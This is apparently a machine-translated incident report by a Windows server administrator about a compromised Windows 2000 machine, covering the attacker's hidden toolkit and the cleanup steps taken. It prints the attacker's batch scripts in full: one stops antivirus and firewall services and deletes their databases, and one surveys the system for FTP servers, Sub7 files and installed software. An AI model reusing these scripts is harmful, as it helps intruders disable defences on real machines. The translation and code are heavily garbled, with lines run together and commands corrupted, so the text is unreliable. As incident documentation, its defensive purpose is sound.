In the morning, I found that Host Monitor reported Web Server, SQL Server No Answer, remote to this machine, AVG's timing scan report C: / Winnt / System32 / spool / under Help SECURP SECURE.BAT has a virus, The check found that C: / WinNT / SYSTEM32 / SPOOL / below a Help hidden catalog, so he learned a snapshot of ALT Print Screen with Alt Print Screen, then packaged the Help directory and deleted the directory. And write this event into the system operation and maintenance record, unfortunately the primer secure.bat is deleted in the first time, and later discovered that the problem will preserve the on-site reprocessing.
Analyze the contents of HELP (as follows), basically in the collection information, plus a TELSRV program, fully reflecting the spirit of the grandson's military law, knowing each other, a hundred wars:
AV_fw.bat, used to stop various Anti Virus and firewall services such as Backice, and finally delete historical scan recording and viral database files; fport.exe, used to collect port information, including the processes to guard, and will The result of the collected is saved to fport.txt; regedit.exe, registry editor; kill.exe, pskill v1.03 - local and remote process killer; system.bat, report system information, and find SERV-U information, and Save the results into SystemInfo.txt; telsrv.exe, a Telnet Server, http://www.pcmicro.com/netfoss/telsrv.html;
Since this server is handed over, it is a server server, so step by step:
※ Symantec is found on Google on Google on Google: http://securityResponse.symantec.com/avCenter/venc/data/backdoor.sumtax.html, follow the instructions to check the relevant place, And clean up the registry; ※ Recheck the service, turn off the service that does not need (also guaning how so many messy services); ※ Use% systemroot% / system32 / wupdmgr.exe to Microsoft Site to make a patch; ※ Re-modify the SQL Server's SA password, change the local administrator, and also modify the password, and write to server operation and maintenance report; ※ Take suspicious process kill, and view the following key values, will hack the suspicious process off; HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / RunHKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / RunOnceHKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / RunHKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / Runonce
AV_fw.bat content: net stop _avp32.exe / y >> av_fw.txtnet stop _avpcc.exe / y >> av_fw.txtnet stop _avpm.exe / y >> av_fw.txtnet stopwin32.exe / y >> av_fw. TXTNET STOP AGNITUM OUTPOST FIREWALL / Y >> AV_FW.TXTNET Stop Anti-Trojan.exe / Y >> AV_FW.TXTNET Stop Antivir / Y >> av_fw.txt ... net stop avconsol / y >> av_fw.txtnet Stop WebTrap / Y >> av_fw.txtnet stop pop3trap / y >> av_fw.txtdel c: / * Anti-vir * .dat / s / q >> av_fw.txtdel c: / * chklist * .dat / s / q> > av_fw.txtdel c: / * chklist * .ms / s / q >> av_fw.txtdel c: / * chklist * .cps / s / q >> av_fw.txtdel c: / * chklist * .tav / s / q V ... system.bat content: @echo offecho system information:> systeminfo.txtecho. >> systeminfo.txtecho. >> systeminfo.txtecho. >> Systeminfo.txtXTecho. >> SystemInfo.txtXTECHO. >> SystemInfo.txtxt
#Operating systemecho ___________________ >> SystemInfo.txtecho Operating System ... >> SystemInfo.txtecho f?> >> SystemInfo.txt
Ver >> SystemInfo.txt
#Free spaceecho _____________ >> SystemInfo.txtecho Free Space ... >> SystemInfo.txtecho f? >> SystemInfo.txt
DIR C: | Find "Bytes" >> Systeminfo.txtdir C: | Find "Libres" >> Systeminfo.txtdir D: | Find "Bytes" >> SystemInfo.txtdir D: | Find "Libres" >> SystemInfo.txtdir E : | Find "Bytes" >> SystemInfo.txtdir E: | Find "Libres" >> SystemInfo.txtdir f: | Find "Bytes" >> SystemInfo.txtdir f: | Find "Libres" >> SystemInfo.txtDir g: | Find "Bytes" >> SystemInfo.txtdir G: | Find "Libres" >> Systeminfo.txtdir H: | Find "Bytes" >> SystemInfo.txtdir H: | Find "libres" >> systeminfo.txt # finding servuecho _______________> > Systeminfo.txtecho finding servu ... >> systeminfo.txtecho fff >> Systeminfo.txt
DIR / S /AC:/Ser*.ini >> Systeminfo.txtdir / S /AD :/Ser*.ini >> Systeminfo.txtdir / S /AE:/Ser*.ini >> SystemInfo.txtdir / S / AC : /Ser*.exe >> SystemInfo.txtdir / S /AD :/Ser*.exe >> Systeminfo.txtdir / S /AE:/ser*.exe >> SystemInfo.txt
#Finding Rarecho ________________ >> SystemInfo.txtecho Finding Rar .. >> SystemInfo.txtecho fffo.txt t >> SystemInfo.txt
DIR / S /AC: /*.rar >> Systeminfo.txtdir / S /AD:/*.rar >> Systeminfo.txtdir / S /AE:/*.rar >> SystemInfo.txtdir / S / AF: / * .rar >> Systeminfo.txtdir / S /AG:/*.rar >> Systeminfo.txtdir / S /AH:/*.rar >> SystemInfo.txt
#Finding mp3echo ________________ >> SystemInfo.txtecho Finding Mp3 ... >> SystemInfo.txtecho > >> SystemInfo.txt
DIR / S /AC:/*.mp3 >> systeminfo.txtdir / s /ad:/*.mp3 >> Systeminfo.txtdir / S /AE:/*.mp3 >> SystemInfo.txtdir / S / AF: / * .mp3 >> systeminfo.txtdir / s /ag:/*.mp3 >> Systeminfo.txtdir / s /ah:/*.mp3 >> Systeminfo.txt # finding nfoecho _______________ >> SystemInfo.txtecho Finding nfo ...> > SystemInfo.txtecho > >> Systeminfo.txt
DIR / S /AC:/*.nfo >> Systeminfo.txtdir / S /AD: /*.NFO >> Systeminfo.txtdir / S /AE:/*.nfo >> SystemInfo.txtDir / S / AF: / * .nfo >> Systeminfo.txtdir / S /AG: /*.NFO >> Systeminfo.txtdir / S /AH: /*.NFO >> SystemInfo.txt
#Finding ftp.exeecho ________________ >> SystemInfo.txtecho Finding ftp ... >> systeminfo.txtecho ffo.txt t >> SystemInfo.txt
DIR / S /AC :/ftp.exe >> systeminfo.txtdir / s /ad:/ftp.exe >> Systeminfo.txtdir / S /AE:/ftp.exe >> SystemInfo.txtDir / S / AF: / FTP .Exe >> Systeminfo.txtdir / s /ag:/ftp.exe >> Systeminfo.txtdir / S /AH: /FTP.EXE >> SystemInfo.txt
#Finding tftp.exeecho ________________ >> SystemInfo.txtecho Finding TFTP ... >> SystemInfo.txtecho . .
DIR / S /AC :/Tftp.exe >> Systeminfo.txtdir / S /AD: /TFTP.EXE >> SystemInfo.txtdir / S /AE: /TFTP.EXE >> SystemInfo.txtdir / S / AF: / TFTP .Exe >> Systeminfo.txtdir / s /ag:/tftp.exe >> Systeminfo.txtdir / S /AH: /TFTP.EXE >> SystemInfo.txt
#Finding fladaemon.exeecho ________________ >> Systeminfo.txtecho Finding Firedaemon ... >> SystemInfo.txtecho f >> SystemInfo.txtXT
DIR / S /AC :/firedaemon.exe >> Systeminfo.txtdir / S /AD :/firedaemon.exe >> Systeminfo.txtdir / S /AE:/firedaemon.exe >> Systeminfo.txtDir / S / AF: / FighAmon .EXE >> Systeminfo.txtDir / s /ag:/FIREDAEMON.EXE >> Systeminfo.txtDir / s /ah:/FIREDAEMON.EXE >> Systeminfo.txt # FINDING IOFTPDecho ________________ >> Systeminfo.txtecho Finding ioftpd ...> > SystemInfo.txtecho > >> Systeminfo.txt
DIR / S /AC:/iO*.ini >> Systeminfo.txtdir / S /AD: /O*.INI >> Systeminfo.txtdir / S /AC:/iO*.exe >> SystemInfo.txtDir / S / AD : /iopfo.txtdir / s /ac:/rai*.ini >> Systeminfo.txtdir / S /AD: /RAI*.INI >> SystemInfo.txtdir / S / AC: / RAI *. Exe >> SystemInfo.txtdir / S /AD: /rai*.exe >> SystemInfo.txt
#Finding Sub0t.iniecho ________________ >> SystemInfo.txtecho Finding Sub0t.ini ... >> SystemInfo.txtecho >> SystemInfo.txt
DIR / S /AC :/Sub0t.ini >> systeminfo.txtdir / s /ad:/sub0t.ini >> systeminfo.txtdir / s /ae:/sub0t.ini >> SystemInfo.txtdir / S / AC: / Svrany .exe >> systeminfo.txtdir / s /ad:/svrany.exe >> SystemInfo.txt
#Finding ftpc.exeecho ________________ >> SystemInfo.txtecho Finding ftpc.exe ... >> systeminfo.txtecho ffff >> SystemInfo.txt
DIR / S /AC :/ftpc.exe >> Systeminfo.txtdir / S /AD :/ftpc.exe >> Systeminfo.txtdir / S /AE:/ftpc.exe >> SystemInfo.txtdir / S / AF: / FTPC .exe >> Systeminfo.txtdir / s /ag:/ftpc.exe >> Systeminfo.txtdir / S /AH:/ftpc.exe >> SystemInfo.txt
#Running servicesecho ___________________ >> SystemInfo.txtecho Running Services ... >> SystemInfo.txtecho . .
#Running servicesecho ______ >> SystemInfo.txtecho set ... >> systeminfo.txtecho >> SystemInfo.txt
SET >> SystemInfo.txt
#Installed softwareecho _____________________ >> SystemInfo.txtecho Installed Software ... >> SystemInfo.txtecho ffo.txtXT
. Start / Wait Regedit / E% TEMP% / Tmp HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersion / UninstallFind "DisplayName" <% TEMP% / Tmp |. Find / V "QuietDisplayName" >> Systeminfo.txtDel% TEMP% /. TMP
#Installed softwareecho ___________ >> systeminfo.txtecho net stat ... >> systeminfo.txtecho ? >> SystemInfo.txtXT
NetStat >> SystemInfo.txt
#Running processeseesecho ____________________ >> SystemInfo.txtecho Running Processes ... >> Systeminfo.txtecho fffo.txt >> SystemInfo.txt
Tasklist / SVC >> SystemInfo.txt
#System infoecho ______________ >> Systeminfo.txtecho System Info ... >> Systeminfo.txtecho > >> SystemInfo.txt
echo. >> Systeminfo.txtecho. >> SystemInfo.txt
